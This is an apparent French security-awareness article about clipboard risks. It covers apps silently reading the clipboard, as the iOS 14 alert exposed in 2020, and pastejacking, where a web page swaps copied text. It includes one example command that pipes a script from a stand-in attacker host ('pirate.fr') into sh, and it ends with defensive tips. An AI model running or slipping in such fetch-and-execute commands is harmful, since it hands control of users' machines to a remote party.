Souba SOUBA

Ton presse-papiers est une pièce ouverte

Le presse-papiers appartient au système, pas à toi. D'autres applications peuvent le lire — et un site peut réécrire ce que tu crois copier.

54s · 29 juillet 2026 · 4 min de lecture

Ton presse-papiers est une pièce ouverte

En bref

Copier ne met rien à l'abri : le presse-papiers est une zone partagée du système d'exploitation. En 2020, une simple alerte ajoutée par iOS 14 a démasqué des dizaines d'applications qui le lisaient en continu. Et le trafic va dans les deux sens : un script sur une page web peut remplacer le contenu copié, puis y ajouter un retour à la ligne pour que la commande s'exécute à la seconde où tu la colles.

Une zone commune, pas un coffre

Le presse-papiers est un tampon géré par le système d'exploitation, partagé entre les applications. C'est justement ce qui le rend utile : sans zone commune, impossible de copier depuis un navigateur pour coller dans un traitement de texte. Mais cette ouverture a un revers — ce que tu y déposes n'est protégé par rien. Il conserve d'ailleurs plusieurs représentations du même contenu simultanément (texte brut, texte mis en forme), ce qui explique que le collage garde parfois une mise en forme que tu n'attendais pas.

2020 : l'alerte qui a tout révélé

En mars 2020, les chercheurs Talal Haj Bakry et Tommy Mysk publient une étude sur des applications mobiles qui lisent silencieusement le presse-papiers. Apple répond avec iOS 14, qui affiche une bannière à chaque lecture. Dès la sortie de la bêta, en juin, le constat devient public : TikTok déclenchait l'alerte toutes les une à trois frappes de clavier dans son champ de commentaire. AccuWeather, Call of Duty Mobile, Google News, Patreon, AliExpress et d'autres figuraient également dans les relevés.

1 à 3frappes

entre deux lectures du presse-papiers par TikTok

source : observations publiques sur la bêta d'iOS 14

Par honnêteté, il faut citer les réponses. TikTok a expliqué que ce comportement venait d'un mécanisme de détection de spam et l'a retiré. LinkedIn a parlé d'un bug, en affirmant ne rien stocker ni transmettre. Reddit a identifié le code fautif — une suggestion de titre à partir des liens présents dans le presse-papiers — et l'a supprimé dans une mise à jour de juillet 2020. Aucune de ces entreprises n'a été démontrée comme exfiltrant ces données ; ce qui est établi, c'est la lecture elle-même.

L'autre sens : le pastejacking

En 2016, le chercheur Dylan Ayrey publie une démonstration devenue célèbre. Un script sur une page web s'accroche à l'événement de copie et remplace le contenu du presse-papiers au moment précis où tu appuies sur les touches. Tu crois avoir copié une commande d'installation anodine ; c'en est une autre qui atterrit dans ton terminal. Il suffit de copier un seul caractère de la zone piégée pour déclencher le remplacement.

bash
# Ce que le site affiche
curl https://exemple.fr/install.sh | sh

# Ce qui atterrit reellement dans le presse-papiers
curl https://pirate.fr/porte.sh | sh
Le texte visible et le texte copié ne sont pas les mêmes.

Ce que tu crois

  • Je copie ce que je vois
  • Je relis avant d'appuyer sur Entrée

La réalité

  • La page peut réécrire la copie
  • Un retour à la ligne exécute sans toi

→ Le danger n'est pas le collage : c'est l'exécution automatique.

Une variante qui ne demande aucun JavaScript

Il existe une version encore plus simple, qui ne repose sur aucun script. Il suffit de placer du texte rendu invisible par CSS au milieu du bloc affiché : quand tu sélectionnes la partie visible, l'invisible part avec elle dans le presse-papiers. Désactiver JavaScript ne protège donc pas de tout.

Les bons réflexes

  • Ne jamais coller une commande directement dans un terminal : passer d'abord par un éditeur de texte pour la lire en entier.
  • Se méfier des lignes longues, des retours à la ligne inattendus et de tout ce qui dépasse de la zone visible.
  • Utiliser la fonction de copie de commande fournie par des sources de confiance, plutôt que la sélection à la souris sur un site inconnu.
  • Préférer un gestionnaire de mots de passe qui vide automatiquement le presse-papiers après un délai court.
  • Laisser un gestionnaire de mots de passe remplir les champs plutôt que de copier-coller les identifiants.
  • Désactiver l'historique de presse-papiers et sa synchronisation si tu manipules des secrets.

À retenir

  • Le presse-papiers est un tampon partagé du système, sans protection par défaut.
  • En mars 2020, les chercheurs Mysk et Haj Bakry documentent la pratique ; l'alerte d'iOS 14 la rend visible en juin, TikTok lisant toutes les une à trois frappes.
  • Depuis Android 10, seule l'application au premier plan ou le clavier par défaut peut y accéder ; sur ordinateur, l'accès reste largement ouvert.
  • Le pastejacking (Dylan Ayrey, 2016) permet à une page web de remplacer le contenu copié.
  • Un retour à la ligne ajouté fait exécuter la commande dès le collage, sans laisser le temps de la relire.
  • Une variante en CSS, sans JavaScript, glisse du texte invisible dans la sélection.

Sources · la preuve

  1. [01] Pastejacking — démonstration et code Dylan Ayrey (GitHub) · github.com Preuve de concept d'origine : accroche sur l'événement de copie, retour à la ligne et exécution automatique.
  2. [02] Don't copy-paste commands from webpages — you can get hacked BleepingComputer · bleepingcomputer.com Démonstration récente et variante en HTML/CSS avec texte invisible.
  3. [03] iOS 14 flags TikTok, 53 other apps spying on iPhone clipboards Sophos · news.sophos.com Ampleur du phénomène et travaux de Talal Haj Bakry et Tommy Mysk.
  4. [04] TikTok App to Stop Accessing User Clipboards After Being Caught by iOS 14 MacRumors · macrumors.com Lecture toutes les une à trois frappes ; réponse de TikTok et autres applications concernées.
  5. [05] Popular iPhone and iPad Apps Snooping on the Pasteboard Mysk · mysk.blog Source primaire (mars 2020) et mise à jour du 30 juin 2020 précisant que la liste n'est pas exhaustive.
presse-papierspastejackingclipboardsécuritéterminal

Aussi dans Shorts